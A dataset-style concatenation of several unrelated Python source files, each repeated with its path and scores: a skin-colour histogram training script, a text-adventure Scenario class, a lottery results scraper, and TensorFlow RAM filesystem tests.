logger.info("big_hist_sv pickled to {}".format(fp))
logger.info("Histogram data for RGB and HSV has been pickled.")
logger.warning("Removing 'size' key from histograms.")
del big_hist_rgb["size"]
del big_hist_hsv["size"]
del big_hist_rg["size"]
del big_hist_rb["size"]
del big_hist_gb["size"]
del big_hist_hs["size"]
del big_hist_hv["size"]
del big_hist_sv["size"] | MP4/mp4_histogram_training.py |
import logging
import os
import sys
try:
import cPickle as pickle
except ImportError: # Python 3.x
import pickle
import colorlog
import numpy as np
from PIL import Image
logger = logging.getLogger()
logger.setLevel(colorlog.colorlog.logging.INFO)
handler = colorlog.StreamHandler()
handler.setFormatter(colorlog.ColoredFormatter())
logger.addHandler(handler)
# logger.debug("Debug message")
# logger.info("Information message")
# logger.warning("Warning message")
# logger.error("Error message")
# logger.critical("Critical message")
np.set_printoptions(threshold=sys.maxsize)
np.set_printoptions(linewidth=10000)
script_dir = os.path.dirname(__file__)
training_data_dir = os.path.join(
script_dir, "histogram_training_images", "sfa", "SKIN", "5"
)
# training_data_dir = os.path.join(script_dir,
# "histogram_training_images",
# "sfa_small_test")
hist_output_dir = os.path.join(script_dir, "histogram_data")
def img2hists(img_path, hist_rgb={}, hist_hsv={}, total_pixels=0):
"""Given a Pillow image, return the number of pixels in it, and two
dictionaries, containing the histogram data of the image as an RGB
file and an HSV file respectively.
By default it gives dictionaries for just the current image, but if
you want to collect information for a sequence of images you can pass
it non-empty dictionaries for hist_rgb and hist_hsv."""
image_array_rgb = np.array(Image.open(img).convert("RGB"))
image_array_hsv = np.array(Image.open(img).convert("HSV"))
total_pixels += image_array_rgb.shape[0] * image_array_rgb.shape[1]
for i in range(0, image_array_rgb.shape[0]):
for j in range(0, image_array_rgb.shape[1]):
rgb = (
image_array_rgb[i, j, 0],
image_array_rgb[i, j, 1],
image_array_rgb[i, j, 2],
)
hsv = (
image_array_hsv[i, j, 0],
image_array_hsv[i, j, 1],
image_array_hsv[i, j, 2],
)
if rgb in hist_rgb:
hist_rgb[rgb] += 1
else:
hist_rgb[rgb] = 1
if hsv in hist_hsv:
hist_hsv[hsv] += 1
else:
hist_hsv[hsv] = 1
return (total_pixels, hist_rgb, hist_hsv)
def slice_hist(hist):
hist_xy = dict()
hist_xz = dict()
hist_yz = dict()
for key in hist.keys():
if (key[0], key[1]) in hist_xy:
hist_xy[(key[0], key[1])] += hist[key]
else:
hist_xy[(key[0], key[1])] = hist[key]
if (key[0], key[2]) in hist_xz:
hist_xz[(key[0], key[2])] += hist[key]
else:
hist_xz[(key[0], key[2])] = hist[key]
if (key[1], key[2]) in hist_yz:
hist_yz[(key[1], key[2])] += hist[key]
else:
hist_yz[(key[1], key[2])] = hist[key]
logger.debug("XY hist created - {}".format(hist_xy))
logger.debug("XZ hist created - {}".format(hist_xz))
logger.debug("YZ hist created - {}".format(hist_yz))
return (hist_xy, hist_xz, hist_yz)
if __name__ == "__main__":
# Change this if you want more or fewer logging messages.
logger.info("<NAME> - EECS 332, MP 4 - Histogram training module")
logger.info("-" * 80)
big_total_pixels = 0
big_hist_rgb = {}
big_hist_hsv = {}
logger.warning(
"Constructing un-normalized histograms for directory (this might take a while): {}".format(
training_data_dir
)
)
for path, subdirs, files in os.walk(training_data_dir):
for name in files:
img = os.path.join(path, name)
logger.debug("Now analyzing {}".format(img))
logger.debug("Constructing individual for {}".format(img))
(img_total_pixels, img_hist_rgb, img_hist_hsv) = img2hists(img)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total pixels :: {}".format(img_total_pixels))
logger.debug("RGB individual histogram dict :: {}".format(img_hist_rgb))
logger.debug("HSV individual histogram dict :: {}".format(img_hist_hsv))
logger.debug("Adding to cumulative histogram data for {}".format(img))
(big_total_pixels, big_hist_rgb, big_hist_hsv) = img2hists(
img, big_hist_rgb, big_hist_hsv, big_total_pixels
)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total cumulative pixels :: {}".format(big_total_pixels))
logger.debug("RGB cumulative histogram dict :: {}".format(big_hist_rgb))
logger.debug("HSV cumulative histogram dict :: {}".format(big_hist_hsv))
logger.debug(" -> File competed: {}".format(img))
logger.info(
"Non-normalized histograms have been constructed for directory: {}".format(
training_data_dir
)
)
logger.info("Constructiong 2-tuple slices of RGB and HSV hists.")
(big_hist_rg, big_hist_rb, big_hist_gb) = slice_hist(big_hist_rgb)
(big_hist_hs, big_hist_hv, big_hist_sv) = slice_hist(big_hist_hsv)
rgb_count_check = 0
for key in big_hist_rgb.keys():
rgb_count_check += big_hist_rgb[key]
rg_count_check = 0
for key in big_hist_rg.keys():
rg_count_check += big_hist_rg[key]
rb_count_check = 0
for key in big_hist_rb.keys():
rb_count_check += big_hist_rb[key]
gb_count_check = 0
for key in big_hist_gb.keys():
gb_count_check += big_hist_gb[key]
hs_count_check = 0
for key in big_hist_hs.keys():
hs_count_check += big_hist_hs[key]
hv_count_check = 0
for key in big_hist_hv.keys():
hv_count_check += big_hist_hv[key]
sv_count_check = 0
for key in big_hist_sv.keys():
sv_count_check += big_hist_sv[key]
hsv_count_check = 0
for key in big_hist_hsv.keys():
hsv_count_check += big_hist_hsv[key]
try:
if (
rgb_count_check != hsv_count_check
or rgb_count_check != big_total_pixels
or hsv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("Histogram counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rgb_count_check = {}".format(rgb_count_check))
logger.warning(" -> hsv_count_check = {}".format(hsv_count_check))
try:
if (
hs_count_check != big_total_pixels
or hv_count_check != big_total_pixels
or sv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("HSV 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> hv_count_check = {}".format(hv_count_check))
logger.warning(" -> hs_count_check = {}".format(hs_count_check))
logger.warning(" -> sv_count_check = {}".format(sv_count_check))
try:
if (
rb_count_check != big_total_pixels
or rg_count_check != big_total_pixels
or gb_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("RGB 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rg_count_check = {}".format(rg_count_check))
logger.warning(" -> rb_count_check = {}".format(rb_count_check))
logger.warning(" -> gb_count_check = {}".format(gb_count_check))
logger.info("Pickling non-normalized histogram dicts with 'size' key added.")
big_hist_rgb["size"] = big_total_pixels
big_hist_hsv["size"] = big_total_pixels
big_hist_rg["size"] = big_total_pixels
big_hist_rb["size"] = big_total_pixels
big_hist_gb["size"] = big_total_pixels
big_hist_hs["size"] = big_total_pixels
big_hist_hv["size"] = big_total_pixels
big_hist_sv["size"] = big_total_pixels
rgb_hist_location = os.path.join(hist_output_dir, "hist_rgb.pickle")
hsv_hist_location = os.path.join(hist_output_dir, "hist_hsv.pickle")
rg_hist_location = os.path.join(hist_output_dir, "hist_rg.pickle")
rb_hist_location = os.path.join(hist_output_dir, "hist_rb.pickle")
gb_hist_location = os.path.join(hist_output_dir, "hist_gb.pickle")
hs_hist_location = os.path.join(hist_output_dir, "hist_hs.pickle")
hv_hist_location = os.path.join(hist_output_dir, "hist_hv.pickle")
sv_hist_location = os.path.join(hist_output_dir, "hist_sv.pickle")
with open(rgb_hist_location, "wb") as fp:
pickle.dump(big_hist_rgb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rgb pickled to {}".format(fp))
with open(hsv_hist_location, "wb") as fp:
pickle.dump(big_hist_hsv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hsv pickled to {}".format(fp))
with open(rg_hist_location, "wb") as fp:
pickle.dump(big_hist_rg, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rg pickled to {}".format(fp))
with open(rb_hist_location, "wb") as fp:
pickle.dump(big_hist_rb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rb pickled to {}".format(fp))
with open(gb_hist_location, "wb") as fp:
pickle.dump(big_hist_gb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_gb pickled to {}".format(fp))
with open(hs_hist_location, "wb") as fp:
pickle.dump(big_hist_hs, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hs pickled to {}".format(fp))
with open(hv_hist_location, "wb") as fp:
pickle.dump(big_hist_hv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hv pickled to {}".format(fp))
with open(sv_hist_location, "wb") as fp:
pickle.dump(big_hist_sv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_sv pickled to {}".format(fp))
logger.info("Histogram data for RGB and HSV has been pickled.")
logger.warning("Removing 'size' key from histograms.")
del big_hist_rgb["size"]
del big_hist_hsv["size"]
del big_hist_rg["size"]
del big_hist_rb["size"]
del big_hist_gb["size"]
del big_hist_hs["size"]
del big_hist_hv["size"]
del big_hist_sv["size"] | 0.391057 | 0.209025 |
import json
import logging
import uuid
from typing import Type, TypeVar
from dataclasses import replace
from server.engine.action_result import ActionResult
from server.engine.ending import Ending
from server.engine.location import Location
from server.engine.object import AdventureObject, Activateable
# Generic variable that can be 'Scenario' or any subclass.
T = TypeVar('T', bound='Scenario')
class Scenario():
"""A text adventure scenario."""
def __init__(self, title: str, greeting: str, starting_location_id: str,
**kwargs):
self.title: str = title
self.greeting: str = greeting
self.starting_location_id: str = starting_location_id
self.UNKNOWN_ACTION_RESPONSE: str = kwargs.get(
'UNKNOWN_ACTION_RESPONSE', 'You aren\'t so sure about that.')
self.game_id: str = kwargs.get('game_id', uuid.uuid4().__str__())
self.all_locations: Dict[str, Location] = {}
self.all_objects: Dict[str, AdventureObject] = {}
self.all_endings: list[Ending] = []
self.player_inventory: Dict[str, AdventureObject] = {}
self.player_location = None
self.ended = False
def __repr__(self):
return f'{self.title}, locs: {self.all_locations} objs: {self.all_objects}, endings: {self.all_endings}'
def add_location(self, loc: Location) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_locations.get(loc.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_locations[loc.id] = loc
def add_object(self, obj: AdventureObject) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_objects.get(obj.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_objects[obj.id] = obj
def add_ending(self, ending: Ending):
self.all_endings.append(ending)
def begin(self) -> None:
"""Begins the scenario.
The initialization logic once a Scenario is fully assembled and the
AdventureEngine is ready to send the first message to the player.
"""
logging.debug('SCENARIO CONFIGURATION:')
logging.debug(
'all_locations: %s',
[location.id for location in self.all_locations.values()])
logging.debug('all_objects: %s',
[obj.id for obj in self.all_objects.values()])
if not self.all_locations.get(self.starting_location_id):
raise RuntimeError('staring location not found in all_locations')
self.player_location = self.all_locations[self.starting_location_id]
def move(self, direction: str, **kwargs) -> ActionResult:
"""Move action handler for the scenario.
NOTE: This is the only handler that is called on a MOVE action.
"""
if direction in self.player_location.exits:
target_loc = self.all_locations[
self.player_location.exits[direction]]
# Check to see if the location requires any items.
if target_loc.requires:
for item_id in target_loc.requires:
if item_id not in self.player_inventory:
return ActionResult(
action_text=target_loc.travel_failure)
self.player_location = target_loc
# After moving, remove any required items.
for item_id in target_loc.requires:
self.player_inventory.pop(item_id)
target_loc.remove_requirement(item_id)
# Check to see if the move ends the game.
for ending in self.all_endings:
if ending.fulfilled(self.player_inventory,
self.player_location.id):
self.ended = True
return ActionResult(adventure_text=ending.message,
action_text="")
action_text = target_loc.travel_action or f'You travel {direction}.'
# Use replace because look also returns a ActionResult.
# (And we want the action_text to be either the generic travel text
# or the location custom travel_action.)
return replace(self.player_location.look(**kwargs),
action_text=action_text,
push_inventory_update=True)
else:
return ActionResult(action_text='You cannot go that way.')
def serialize(self) -> str:
"""Transform the current scenario into a data string for storage."""
data = {}
data['game_id'] = self.game_id
data['title'] = self.title
data['greeting'] = self.greeting
data['starting_location_id'] = self.starting_location_id
data['UNKNOWN_ACTION_RESPONSE'] = self.UNKNOWN_ACTION_RESPONSE
data['all_locations'] = [
location.serialize() for location in self.all_locations.values()
]
data['all_objects'] = [
obj.serialize() for obj in self.all_objects.values()
]
data['player_location'] = self.player_location.serialize(
) if self.player_location else ''
data['player_inventory'] = [
obj.serialize() for obj in self.player_inventory.values()
]
data['all_endings'] = [
ending.serialize() for ending in self.all_endings
]
logging.debug(f'serialize scenario: {self}')
return json.dumps(data)
@classmethod
def deserialize(cls: Type[T], data: str) -> T:
"""Transform a data string into a loaded scenario."""
loaded = json.loads(data)
scenario = cls(**loaded)
for obj in loaded['all_objects']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.all_objects[loaded_obj.id] = loaded_obj
for loc in loaded['all_locations']:
loaded_loc = Location.deserialize(loc)
scenario.all_locations[loaded_loc.id] = loaded_loc
player_location = Location.deserialize(loaded['player_location'])
if player_location.id not in scenario.all_locations.keys():
raise RuntimeError(
'Player location could not be found in loaded data!')
scenario.player_location = scenario.all_locations[player_location.id]
for obj in loaded['player_inventory']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.player_inventory[loaded_obj.id] = loaded_obj
for ending in loaded['all_endings']:
scenario.add_ending(Ending.deserialize(ending))
logging.debug(f'deserialize scenario: {scenario}')
return scenario | server/engine/scenario.py | import json
import logging
import uuid
from typing import Type, TypeVar
from dataclasses import replace
from server.engine.action_result import ActionResult
from server.engine.ending import Ending
from server.engine.location import Location
from server.engine.object import AdventureObject, Activateable
# Generic variable that can be 'Scenario' or any subclass.
T = TypeVar('T', bound='Scenario')
class Scenario():
"""A text adventure scenario."""
def __init__(self, title: str, greeting: str, starting_location_id: str,
**kwargs):
self.title: str = title
self.greeting: str = greeting
self.starting_location_id: str = starting_location_id
self.UNKNOWN_ACTION_RESPONSE: str = kwargs.get(
'UNKNOWN_ACTION_RESPONSE', 'You aren\'t so sure about that.')
self.game_id: str = kwargs.get('game_id', uuid.uuid4().__str__())
self.all_locations: Dict[str, Location] = {}
self.all_objects: Dict[str, AdventureObject] = {}
self.all_endings: list[Ending] = []
self.player_inventory: Dict[str, AdventureObject] = {}
self.player_location = None
self.ended = False
def __repr__(self):
return f'{self.title}, locs: {self.all_locations} objs: {self.all_objects}, endings: {self.all_endings}'
def add_location(self, loc: Location) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_locations.get(loc.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_locations[loc.id] = loc
def add_object(self, obj: AdventureObject) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_objects.get(obj.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_objects[obj.id] = obj
def add_ending(self, ending: Ending):
self.all_endings.append(ending)
def begin(self) -> None:
"""Begins the scenario.
The initialization logic once a Scenario is fully assembled and the
AdventureEngine is ready to send the first message to the player.
"""
logging.debug('SCENARIO CONFIGURATION:')
logging.debug(
'all_locations: %s',
[location.id for location in self.all_locations.values()])
logging.debug('all_objects: %s',
[obj.id for obj in self.all_objects.values()])
if not self.all_locations.get(self.starting_location_id):
raise RuntimeError('staring location not found in all_locations')
self.player_location = self.all_locations[self.starting_location_id]
def move(self, direction: str, **kwargs) -> ActionResult:
"""Move action handler for the scenario.
NOTE: This is the only handler that is called on a MOVE action.
"""
if direction in self.player_location.exits:
target_loc = self.all_locations[
self.player_location.exits[direction]]
# Check to see if the location requires any items.
if target_loc.requires:
for item_id in target_loc.requires:
if item_id not in self.player_inventory:
return ActionResult(
action_text=target_loc.travel_failure)
self.player_location = target_loc
# After moving, remove any required items.
for item_id in target_loc.requires:
self.player_inventory.pop(item_id)
target_loc.remove_requirement(item_id)
# Check to see if the move ends the game.
for ending in self.all_endings:
if ending.fulfilled(self.player_inventory,
self.player_location.id):
self.ended = True
return ActionResult(adventure_text=ending.message,
action_text="")
action_text = target_loc.travel_action or f'You travel {direction}.'
# Use replace because look also returns a ActionResult.
# (And we want the action_text to be either the generic travel text
# or the location custom travel_action.)
return replace(self.player_location.look(**kwargs),
action_text=action_text,
push_inventory_update=True)
else:
return ActionResult(action_text='You cannot go that way.')
def serialize(self) -> str:
"""Transform the current scenario into a data string for storage."""
data = {}
data['game_id'] = self.game_id
data['title'] = self.title
data['greeting'] = self.greeting
data['starting_location_id'] = self.starting_location_id
data['UNKNOWN_ACTION_RESPONSE'] = self.UNKNOWN_ACTION_RESPONSE
data['all_locations'] = [
location.serialize() for location in self.all_locations.values()
]
data['all_objects'] = [
obj.serialize() for obj in self.all_objects.values()
]
data['player_location'] = self.player_location.serialize(
) if self.player_location else ''
data['player_inventory'] = [
obj.serialize() for obj in self.player_inventory.values()
]
data['all_endings'] = [
ending.serialize() for ending in self.all_endings
]
logging.debug(f'serialize scenario: {self}')
return json.dumps(data)
@classmethod
def deserialize(cls: Type[T], data: str) -> T:
"""Transform a data string into a loaded scenario."""
loaded = json.loads(data)
scenario = cls(**loaded)
for obj in loaded['all_objects']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.all_objects[loaded_obj.id] = loaded_obj
for loc in loaded['all_locations']:
loaded_loc = Location.deserialize(loc)
scenario.all_locations[loaded_loc.id] = loaded_loc
player_location = Location.deserialize(loaded['player_location'])
if player_location.id not in scenario.all_locations.keys():
raise RuntimeError(
'Player location could not be found in loaded data!')
scenario.player_location = scenario.all_locations[player_location.id]
for obj in loaded['player_inventory']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.player_inventory[loaded_obj.id] = loaded_obj
for ending in loaded['all_endings']:
scenario.add_ending(Ending.deserialize(ending))
logging.debug(f'deserialize scenario: {scenario}')
return scenario | 0.78037 | 0.179135 |
from bs4 import BeautifulSoup
from Spiders.spiders.lottery.lottery_model import LotteryCNSSQ
from Spiders.common import config, database, utils, utils_html
def get_page_num(url, headers):
"""获取url总页数"""
soup = BeautifulSoup(utils_html.getPage(url, headers).content, 'lxml')
pagenums = soup.select('body > table > tr > td > p.pg > strong:nth-of-type(1)')
if len(pagenums) > 0:
return int(pagenums[0].get_text().replace(',', ''))
else:
return 0
def ins_data_ssq():
"""爬取双色球开奖信息并插入数据库"""
# 获取上次爬取的最大ID
conn = database.CommonDBExecutor(config.get_database_url(), LotteryCNSSQ)
results = conn.querybysqlstr(r'''select max(id_) max_id from data_analysis.lottery_cn_ssq''')
end_id = utils.obj2int(results[0]['max_id'])
for list_num in range(1, get_page_num(utils_html.getSSQURL(1), utils_html.getHeaders())): # 从第一页到第getPageNum(url)页
url = utils_html.getSSQURL(list_num)
soup = BeautifulSoup(utils_html.getPage(url, utils_html.getHeaders()).content, 'lxml')
list_date_ = soup.select('body > table > tr > td:nth-of-type(1)')
list_id_ = soup.select('body > table > tr > td:nth-of-type(2)')
list_win_nums = soup.select('body > table > tr > td:nth-of-type(3)')
list_amount_ = soup.select('body > table > tr > td:nth-of-type(4) > strong')
list_prize_first = soup.select('body > table > tr > td:nth-of-type(5) > strong')
list_prize_second = soup.select('body > table > tr > td:nth-of-type(6) > strong')
ssqdatas = []
for date_, id_, win_nums, amount_, prize_first, prize_second in zip(list_date_, list_id_, list_win_nums,
list_amount_, list_prize_first,
list_prize_second):
if int(id_.get_text().replace(',', '')) <= int(end_id): break
data = {
'id_': utils.obj2int(id_.get_text().replace(',', '')),
'date_': date_.get_text(),
'win_nums_red': ','.join(list(win_nums.stripped_strings)[:-1]),
'win_nums_blue': list(win_nums.stripped_strings)[-1],
'amount_': utils.obj2int(amount_.get_text().replace(',', '').strip()),
'prize_first': utils.obj2int(prize_first.get_text().replace(',', '').strip()),
'prize_second': utils.obj2int(prize_second.get_text().replace(',', '').strip())
}
ssqdatas.append(data)
if len(ssqdatas) == 0:
print("【双色球】未爬取到符合条件数据!")
break
else:
print("【双色球】本次爬取到%s条符合条件数据!" % (len(ssqdatas)))
# 插入数据库
conn.insert_by_batch(ssqdatas) | Learn_pkgs/learn/BeautifulSoup/spider_ssq.py |
from bs4 import BeautifulSoup
from Spiders.spiders.lottery.lottery_model import LotteryCNSSQ
from Spiders.common import config, database, utils, utils_html
def get_page_num(url, headers):
"""获取url总页数"""
soup = BeautifulSoup(utils_html.getPage(url, headers).content, 'lxml')
pagenums = soup.select('body > table > tr > td > p.pg > strong:nth-of-type(1)')
if len(pagenums) > 0:
return int(pagenums[0].get_text().replace(',', ''))
else:
return 0
def ins_data_ssq():
"""爬取双色球开奖信息并插入数据库"""
# 获取上次爬取的最大ID
conn = database.CommonDBExecutor(config.get_database_url(), LotteryCNSSQ)
results = conn.querybysqlstr(r'''select max(id_) max_id from data_analysis.lottery_cn_ssq''')
end_id = utils.obj2int(results[0]['max_id'])
for list_num in range(1, get_page_num(utils_html.getSSQURL(1), utils_html.getHeaders())): # 从第一页到第getPageNum(url)页
url = utils_html.getSSQURL(list_num)
soup = BeautifulSoup(utils_html.getPage(url, utils_html.getHeaders()).content, 'lxml')
list_date_ = soup.select('body > table > tr > td:nth-of-type(1)')
list_id_ = soup.select('body > table > tr > td:nth-of-type(2)')
list_win_nums = soup.select('body > table > tr > td:nth-of-type(3)')
list_amount_ = soup.select('body > table > tr > td:nth-of-type(4) > strong')
list_prize_first = soup.select('body > table > tr > td:nth-of-type(5) > strong')
list_prize_second = soup.select('body > table > tr > td:nth-of-type(6) > strong')
ssqdatas = []
for date_, id_, win_nums, amount_, prize_first, prize_second in zip(list_date_, list_id_, list_win_nums,
list_amount_, list_prize_first,
list_prize_second):
if int(id_.get_text().replace(',', '')) <= int(end_id): break
data = {
'id_': utils.obj2int(id_.get_text().replace(',', '')),
'date_': date_.get_text(),
'win_nums_red': ','.join(list(win_nums.stripped_strings)[:-1]),
'win_nums_blue': list(win_nums.stripped_strings)[-1],
'amount_': utils.obj2int(amount_.get_text().replace(',', '').strip()),
'prize_first': utils.obj2int(prize_first.get_text().replace(',', '').strip()),
'prize_second': utils.obj2int(prize_second.get_text().replace(',', '').strip())
}
ssqdatas.append(data)
if len(ssqdatas) == 0:
print("【双色球】未爬取到符合条件数据!")
break
else:
print("【双色球】本次爬取到%s条符合条件数据!" % (len(ssqdatas)))
# 插入数据库
conn.insert_by_batch(ssqdatas) | 0.246715 | 0.120724 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import def_function
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.model_fn import EstimatorSpec
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.module import module
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training import adam
from tensorflow.python.training import training_util
class RamFilesystemTest(test_util.TensorFlowTestCase):
def test_write_file(self):
with gfile.GFile('ram://a.txt', 'w') as f:
f.write('Hello, world.')
f.write('Hello, world.')
with gfile.GFile('ram://a.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_append_file_with_seek(self):
with gfile.GFile('ram://c.txt', 'w') as f:
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'w+') as f:
f.seek(offset=0, whence=2)
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_list_dir(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.ListDirectory('ram://a/b/'), matches)
def test_glob(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://a/b/*'), matches)
matches = []
self.assertEqual(gfile.Glob('ram://b/b/*'), matches)
matches = ['ram://c/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://c/b/*'), matches)
def test_file_exists(self):
with gfile.GFile('ram://exists/a/b/c.txt', 'w') as f:
f.write('')
self.assertTrue(gfile.Exists('ram://exists/a'))
self.assertTrue(gfile.Exists('ram://exists/a/b'))
self.assertTrue(gfile.Exists('ram://exists/a/b/c.txt'))
self.assertFalse(gfile.Exists('ram://exists/b'))
self.assertFalse(gfile.Exists('ram://exists/a/c'))
self.assertFalse(gfile.Exists('ram://exists/a/b/k'))
def test_estimator(self):
def model_fn(features, labels, mode, params):
del params
x = core_layers.dense(features, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
y = core_layers.dense(x, 1)
loss = losses.mean_squared_error(labels, y)
opt = adam.AdamOptimizer(learning_rate=0.1)
train_op = opt.minimize(
loss, global_step=training_util.get_or_create_global_step())
return EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
def input_fn():
batch_size = 128
return (constant_op.constant(np.random.randn(batch_size, 100),
dtype=dtypes.float32),
constant_op.constant(np.random.randn(batch_size, 1),
dtype=dtypes.float32))
config = RunConfig(
model_dir='ram://estimator-0/', save_checkpoints_steps=1)
estimator = Estimator(config=config, model_fn=model_fn)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
def test_savedmodel(self):
class MyModule(module.Module):
@def_function.function(input_signature=[])
def foo(self):
return constant_op.constant([1])
saved_model.save(MyModule(), 'ram://my_module')
loaded = saved_model.load('ram://my_module')
self.assertAllEqual(loaded.foo(), [1])
if __name__ == '__main__':
test.main() | tensorflow/core/platform/ram_file_system_test.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import def_function
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.model_fn import EstimatorSpec
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.module import module
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training import adam
from tensorflow.python.training import training_util
class RamFilesystemTest(test_util.TensorFlowTestCase):
def test_write_file(self):
with gfile.GFile('ram://a.txt', 'w') as f:
f.write('Hello, world.')
f.write('Hello, world.')
with gfile.GFile('ram://a.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_append_file_with_seek(self):
with gfile.GFile('ram://c.txt', 'w') as f:
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'w+') as f:
f.seek(offset=0, whence=2)
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_list_dir(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.ListDirectory('ram://a/b/'), matches)
def test_glob(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://a/b/*'), matches)
matches = []
self.assertEqual(gfile.Glob('ram://b/b/*'), matches)
matches = ['ram://c/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://c/b/*'), matches)
def test_file_exists(self):
with gfile.GFile('ram://exists/a/b/c.txt', 'w') as f:
f.write('')
self.assertTrue(gfile.Exists('ram://exists/a'))
self.assertTrue(gfile.Exists('ram://exists/a/b'))
self.assertTrue(gfile.Exists('ram://exists/a/b/c.txt'))
self.assertFalse(gfile.Exists('ram://exists/b'))
self.assertFalse(gfile.Exists('ram://exists/a/c'))
self.assertFalse(gfile.Exists('ram://exists/a/b/k'))
def test_estimator(self):
def model_fn(features, labels, mode, params):
del params
x = core_layers.dense(features, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
y = core_layers.dense(x, 1)
loss = losses.mean_squared_error(labels, y)
opt = adam.AdamOptimizer(learning_rate=0.1)
train_op = opt.minimize(
loss, global_step=training_util.get_or_create_global_step())
return EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
def input_fn():
batch_size = 128
return (constant_op.constant(np.random.randn(batch_size, 100),
dtype=dtypes.float32),
constant_op.constant(np.random.randn(batch_size, 1),
dtype=dtypes.float32))
config = RunConfig(
model_dir='ram://estimator-0/', save_checkpoints_steps=1)
estimator = Estimator(config=config, model_fn=model_fn)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
def test_savedmodel(self):
class MyModule(module.Module):
@def_function.function(input_signature=[])
def foo(self):
return constant_op.constant([1])
saved_model.save(MyModule(), 'ram://my_module')
loaded = saved_model.load('ram://my_module')
self.assertAllEqual(loaded.foo(), [1])
if __name__ == '__main__':
test.main() | 0.759047 | 0.32021 |